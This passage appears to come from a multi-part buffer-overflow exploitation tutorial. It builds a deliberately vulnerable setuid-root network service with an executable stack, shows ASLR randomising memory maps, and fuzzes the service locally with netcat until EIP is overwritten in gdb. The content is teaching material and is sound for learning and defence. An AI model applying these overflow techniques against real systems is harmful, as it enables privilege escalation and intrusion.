class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main difference here is that the input is converted to a number and if that number is equal to code58623/code, the contents of a different file (codetoken/code) is sent to the client./p h3The Fix/h3 pThe fix is the same as in part 3. The vulnerable code is the call to strncpy on line 102./p h2Setting Up The Environment/h2 pThe environment is going to be exactly the same as in part 3, except we have a new file and ASLR will be enabled./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanadduser appuser/span span class="code-line"span class="go"Adding user `appuser#39; .../span/span span class="code-line"span class="go"Adding new group `appuser#39; (1002) .../span/span span class="code-line"span class="go"Adding new user `appuser#39; (1002) with group `appuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/appuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"root@dev:~# /spanls/span span class="code-line"span class="go"app-net.c/span/span span class="code-line"span class="gp"root@dev:~# /spangcc -z execstack -fno-stack-protector -o app-net app-net.c/span span class="code-line"span class="gp"root@dev:~# /spancp app-net /home/appuser//span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod u+s app-net /span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spancat secret.txt /span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanspan class="nb"echo/span span class="s2"quot;084934-3492048234728-4847847quot;/span gt; token/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l token /span span class="code-line"span class="go"-rw-r--r-- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod span class="m"600/span token /span span class="code-line"span class="gp"root@dev:/home/appuser# /spancat token /span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spansu - appuser/span span class="code-line"span class="gp"appuser@dev:~$ /spanls -l/span span class="code-line"span class="go"total 20/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat token/span span class="code-line"span class="go"cat: token: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pThe big difference here is that we did not change the content of the file code/proc/sys/kernel/randomize_va_space/code, if the value of this wasn't 2, then run the following command to change it: codeecho 2 gt; /proc/sys/kernel/randomize_va_space/code/p pThis means that ASLR will be enabled. We can prove this by looking at the memory map of a process over multiple executions:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/span span class="code-line"span class="normal"87/span/span span class="code-line"span class="normal"88/span/span span class="code-line"span class="normal"89/span/span span class="code-line"span class="normal"90/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"0838a000-083ab000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74e9000-b7528000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7528000-b7646000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7646000-b7647000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7647000-b77a4000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a4000-b77a5000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a5000-b77a7000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a7000-b77a8000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a8000-b77ab000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77b7000-b77b8000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b77b8000-b77b9000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77b9000-b77ba000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77ba000-b77bb000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77bb000-b77bc000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77bd000-b77be000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77be000-b77bf000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77bf000-b77c0000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77c0000-b77c7000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77c7000-b77c8000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77c8000-b77ca000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ca000-b77cb000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77cb000-b77e7000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e7000-b77e8000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e8000-b77e9000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfa32000-bfa53000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08dd9000-08dfa000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74de000-b751d000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b751d000-b763b000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b763b000-b763c000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b763c000-b7799000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b7799000-b779a000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779a000-b779c000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779c000-b779d000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779d000-b77a0000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ac000-b77ad000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b77ad000-b77ae000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77ae000-b77af000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77af000-b77b0000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77b0000-b77b1000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77b1000-b77b2000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77b2000-b77b3000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77b3000-b77b4000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77b4000-b77b5000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77b5000-b77bc000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77bd000-b77bf000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77bf000-b77c0000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77c0000-b77dc000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dc000-b77dd000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dd000-b77de000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfad4000-bfaf5000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"09908000-09929000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b7435000-b7474000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7474000-b7592000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7592000-b7593000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7593000-b76f0000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f0000-b76f1000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f1000-b76f3000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f3000-b76f4000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f4000-b76f7000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7703000-b7704000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b7704000-b7705000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b7705000-b7706000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b7706000-b7707000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b7707000-b7708000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b7708000-b7709000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b7709000-b770a000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b770a000-b770b000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b770b000-b770c000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b770c000-b7713000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b7713000-b7714000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b7714000-b7716000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7716000-b7717000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b7717000-b7733000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7733000-b7734000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7734000-b7735000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfc79000-bfc9a000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"/code/pre/div /td/tr/table pThis command displays the memory ranges of each memory segment inside the codecat/code commands own virtual memory space./p pAs you can see, all of the memory segments are changing their ranges except for the top 3. These top 3 belong to the actual code of the application./p pThis means that we can only predict memory addresses of the actual code of the application and nothing that is dynamically loaded or writable./p pEvery payload we have sent until now has been placed on the codestack/code, which is at the very bottom of the memory segment list on the output and this section of memory isn't static so we can no longer predict the address of our payload (the shellcode)./p h2Testing The App/h2 table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pWe already know a lot about this application, lets try our exploit from last time:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-fuzz.py /span span class="code-line"span class="go"532/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spangdb -q ./app-net /span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanps ax span class="p"|/span grep app-net/span span class="code-line"span class="go"26854 pts/0 S+ 0:00 ./app-net/span/span span class="code-line"span class="go"26951 pts/2 S+ 0:00 grep app-net/span/span span class="code-line"span class="gp"root@dev:~# /spangdb -q -p span class="m"26854/span/span span class="code-line"span class="go"Attaching to process 26854/span/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="go"Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/ld-linux.so.2/span/span span class="code-line"span class="go"0xb77c0424 in __kernel_vsyscall ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/20xw $esp/span/span span class="code-line"span class="go"0xbfaeb670: 0xbfae000a 0xbfaeb694 0x000003e8 0x00000000/span/span span class="code-line"span class="go"0xbfaeb680: 0xbfaeba80 0xbfaeba7c 0x000057a8 0x00000006/span/span span class="code-line"span class="go"0xbfaeb690: 0x00001000 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6a0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6b0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd 